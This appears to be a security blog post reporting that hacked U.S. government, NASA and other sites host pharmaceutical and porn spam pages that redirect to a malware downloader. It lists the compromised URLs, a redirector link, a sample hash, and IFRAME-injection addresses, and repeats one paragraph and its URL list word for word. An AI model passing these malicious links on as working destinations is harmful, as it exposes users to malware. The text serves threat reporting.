![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia0AiHLm2f7yt_yEvBrGRTlRBTj6eg1LHKcCtTa43tNcHs-8zmhUC-SmwzarcOxoOzN8tnqIsEEEVTpBbW1gHp71r7gACX9w6R4yBez5VwQh1PMbneV0QwtJORQ6RS8pdMX3sF9A/s200/chetek.jpg)
Apparently, malicious parties managed to compromise City of Chetek's official site and created several subdomains with URLs consisting of spam redirecting to the downloader's page :
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpL__KLWj-xBBVRINTk-v4coCu98tt4RmnweibFLAbQnBIGCdgUf0BZTZL1IkxPx38QHl5MHp1hd4q0N3FJ3z6v1HOnLIEdp64tNM5dWbicYbgaF2nLPjEF7YLfJMLvlFSe-IUhQ/s200/chetek_redirector.jpg)
st-3.x.cityofchetek-wi.gov/porn/st3/537.html
st-2.x.cityofchetek-wi.gov/porn/st2/322.html
2k.x.cityofchetek-wi.gov/porn/2k-003/1618.html
st-2.x.cityofchetek-wi.gov/porn/st2/409.html
The following URLs redirect to the downloader : freeclipoftheday.com/movie1.php?id=4154&n=teens&border=FFFFFF&bgcolor=000000
Detection rate : Result: 9/32 (28.13%)
File size: 75771 bytes
MD5: a74b09c7e6ca828ec0382c4f4f234bac
SHA1: 2861a4215dd2a579afe1e30372e05d2ea00223f2
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjByKAYgFUFkX-e36tOfqoR7FbulKM0QivoMG9yPSCSaDepCsT317DdfTzrkU7XYL5WQkT1C6YV7t9Rdzplq5xVtDScFZ76cfMV4jl9tkmcELrSvd7toH-XOLzcSWP7mT_EqJQ-Hw/s200/blackhat_SEO.jpg)
2k.x.somersettx.gov/porn/2k-004/156.html
2k.x.somersettx.gov/porn/2k-004/313.html
2k.x.somersettx.gov/porn/2k-004/829.html
2k.x.somersettx.gov/porn/2k-004/830.html
st-5.x.somersettx.gov/porn/st5/103.html
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoHvxgTIzljOpT36V5QFAyq6E3gJSS_tdw-mCAr8mlo9YH_l52dwZih8foAAsp65vbOVjNUzdBfuEtW_8Gm9AJYavxs1lQoDTYgdqbB4hoVvqJ4HnJcaJmczKMVfGY6VrS9grZYg/s200/nasa_pharma_redirector.jpg)
sql.norwood-ma.gov/libraries/transformations/.dir/132/valium-cost.html
ldap.norwood-ma.gov/htdocs/js/.dir/12/valium-online-order.html
Several more high profile sites hosting such scams I came across to yesterday are NASA's Worldwind, and the State of New Jersey that used to historically host such pages :
issues.worldwind.arc.nasa.gov/secure/attachment/10781/Buy-Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10800/Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10791/Panasonic-Ringtone.html
nj.gov/education/voc/9/2007/
nj.gov/education/voc/9/2007/viagra/viagra-online.html
nj.gov/education/voc/9/2007/zoloft/buy-zoloft-online.html
nj.gov/education/voc/9/2007/tramadol/discount-tramadol.html
Several more high profile sites hosting such scams I came across to yesterday are NASA's Worldwind, and the State of New Jersey that used to historically host such pages :
issues.worldwind.arc.nasa.gov/secure/attachment/10781/Buy-Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10800/Valium.html
issues.worldwind.arc.nasa.gov/secure/attachment/10791/Panasonic-Ringtone.html
nj.gov/education/voc/9/2007/
nj.gov/education/voc/9/2007/viagra/viagra-online.html
nj.gov/education/voc/9/2007/zoloft/buy-zoloft-online.html
nj.gov/education/voc/9/2007/tramadol/discount-tramadol.html
Moreover, during the last week, another pack of sites were also reported to serve malware, spam, and blackhat SEO pages on their servers :
Just yesterday for instance, F-Secure discovered a phishing page hosted at India's Police Academy site, and
Sunbelt pointed out that Beer.ch got IFRAME-ed with the following URLs belonging to the Russian Business Network who also IFRAME-ed Bank of India once :
81.95.149.74/1/index.php
81.95.149.74/22/index.php
How is all this happening? In both, automated, and sometimes targeted way, where automated stands for remote file inclusion through botnets.
I sure know all the pharmaceutical blockbusters now.
Related posts:
Bank of India Serving Malware
U.S Consulate in St.Petersburg Serving Malware
Syrian Embassy in London Serving Malware
CISRT Serving Malware
No comments:
Post a Comment